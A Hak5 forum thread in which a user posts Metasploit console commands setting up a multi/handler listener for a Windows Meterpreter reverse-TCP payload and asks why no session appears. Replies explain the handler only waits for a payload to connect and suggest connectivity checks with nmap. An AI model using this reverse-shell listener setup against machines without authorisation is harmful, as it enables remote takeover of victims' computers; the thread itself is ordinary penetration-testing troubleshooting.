Jump to content
Hak5 Forums
peneTHREATe

Metasploit stuck on multi/handler and not goint to meterpreter after exploit command

Recommended Posts

 

I setup my host, my port, and then set my payload but after I type exploit into the terminal it starts the TCP handler and stays on msf exploit (handler)

msf > use exploit/multi/handler
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > set lhost 192.168.x.x
lhost => 192.168.x.x
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit -j
[] Exploit running as background job 0.

[] Started reverse TCP handler on 192.168.1.7:4444 
msf exploit(handler) >

 

Share this post


Link to post
Share on other sites

Yup, because you have just set up a handler. The handler is there to receive payloads. You have to use an exploit or otherwise execute a payload before anything will show up there.

Share this post


Link to post
Share on other sites

That means that a connection isn't happening between you handler and your payload. Can the two machines talk to each other?

Share this post


Link to post
Share on other sites

post your command that generates the payload... confirm you used the correct ip address amd port...

 

what operating system is your machine running the payload.

 

here is a test you can check port 4444 is open... launch the exploit multi handler, then from your victim machine or any other machine do a port scan...

 

Nmap -p 4444 192.168.1.7

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Recently Browsing   0 members

    No registered users viewing this page.

×